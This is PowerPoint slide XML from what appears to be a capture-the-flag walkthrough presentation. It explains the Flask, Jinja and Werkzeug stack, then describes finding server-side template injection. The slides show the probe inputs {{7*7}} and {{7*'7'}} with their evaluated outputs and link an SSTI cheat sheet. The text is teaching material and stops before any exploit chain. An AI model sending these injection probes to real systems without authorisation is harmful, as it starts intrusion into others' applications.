          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3700" dirty="0"/>
              <a:t>Before we go a further, a bit of information on Flask</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EA2844B-8A64-8449-9C63-48D8DFDAF16C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648930" y="2438400"/>
            <a:ext cx="5127029" cy="3785419"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>Flask relies on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>Jinga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> template engine and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>Werkzeug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> WSGI toolkit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.palletsprojects.com/p/jinja/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.palletsprojects.com/p/werkzeug/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://wsgi.readthedocs.io/en/latest/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>Flask is a framework (i.e. a code library) that uses python. Similar to Tornado, Pyramid and Django. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Better intro to Flask here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4C7A07A-245D-7343-B17D-F116CADFFEA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7038611" y="629266"/>
            <a:ext cx="4504459" cy="5037244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43016737-A1CD-6146-A8C0-E798EC029A18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6539345" y="5962209"/>
            <a:ext cx="5003725" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Picture from http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>webapp-dev.blogspot.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/2012/07/flask-guide-for-web-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>application.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155655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E638B-C386-8546-8E95-21F84900DF97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648929" y="629266"/>
            <a:ext cx="10894141" cy="1676603"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3700" dirty="0"/>
              <a:t>A bit more on Flask</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EA2844B-8A64-8449-9C63-48D8DFDAF16C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648930" y="2438400"/>
            <a:ext cx="6596997" cy="3785419"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>How does Flask work?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>User requests the domain’s root URL /</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>routes.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> maps the URL / to a Python function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>The Python function finds a template from /templates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>A web template will look for other things such as CSS, JS and images in the /static folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>Rendered HTML is sent back to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>routes.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>routes.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> sends HTML back to the browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59C07D9F-F4CF-1E46-9317-657263EBE5F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9751917" y="1927952"/>
            <a:ext cx="1791153" cy="1676603"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F929AF4-3C2D-8443-BB7E-A610B67B41B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7960764" y="2308990"/>
            <a:ext cx="1791153" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>Typical structure for a basic Flask application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD8239E0-9B81-AD4D-8ACF-B2B4A0DF7D34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648929" y="5762153"/>
            <a:ext cx="6749398" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Source from above and good tutorial for getting started here: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>code.tutsplus.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/tutorials/an-introduction-to-pythons-flask-framework--net-28822</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AAB2D2B-C833-C54E-9915-B991CBF9CDB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8266469" y="3683818"/>
            <a:ext cx="3276600" cy="2540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F65197B-33C3-1748-9CD2-FD3E77792173}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9009192" y="6223818"/>
            <a:ext cx="1791153" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>Hello world</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1018670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5305F-8952-A14C-AA5B-5ED0F2502EFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Flask…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC46E5AC-4D62-BD49-BDB4-02689EFB2AA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4667250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>So we are looking for the right INPUT and likely the application is running on FLASK.</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So we need to look for some kind of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0"/>
              <a:t>input+vulnerability+flask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> on Google.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>After some Googling, template injection comes up. I found a cheatsheet from a previous CTF write up that was useful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We can test for this vulnerability by using something like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{{7*7}}</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E899FB4-D073-CF4C-A4E9-5418F797CCCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3382962" y="2480513"/>
            <a:ext cx="5426075" cy="1445374"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="50000"/>
                <a:lumOff val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="271159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82274E2-340C-9443-8C6B-E1451669B49A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="681804" y="1952138"/>
            <a:ext cx="5660642" cy="1552534"/>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0A37B14-05F3-B246-A029-E69DEFA821BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7635492" y="1690688"/>
            <a:ext cx="4158118" cy="4590562"/>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79C4FA4D-57FB-134E-88A5-504076A6197F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{{7*7}} = 49 and of course {{7*’7’}} = 7777777</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Oval 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF273C18-46C5-D24D-A638-6F31BD74EE03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189741" y="2719226"/>
            <a:ext cx="644769" cy="4513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0C51A24-860E-0D40-A2D3-BB571B66D11A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9811105" y="1566007"/>
            <a:ext cx="942975" cy="48339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urved Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5277772B-135D-A544-B65C-0F74EB71ABB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15" idx="3"/>
            <a:endCxn id="14" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6342446" y="1690688"/>
            <a:ext cx="3372105" cy="1037717"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 19173"/>
              <a:gd name="adj2" fmla="val 134456"/>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78A9F89-8DE2-6D41-8245-4FAFB9FD042B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="681804" y="3985969"/>
            <a:ext cx="4389402" cy="2509515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62399B15-C82A-8A41-A30A-45FA9296D311}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401310" y="5846544"/>
            <a:ext cx="1566519" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Actually, 7x7 is maths, no? ;)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Arrow Connector 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{634D8317-D051-2045-8C35-5334104631DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="20" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5067479" y="6169710"/>
            <a:ext cx="333831"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40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0452-4F1F-B041-B901-19894ECC4201}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>How does Template Injection work?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B041274-A51B-7747-AB1A-1C3F439E4FA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4667250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>For it’s presentation layer, Flask uses the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Jinga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> engine which allows you to create templates by using strings of HTML.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
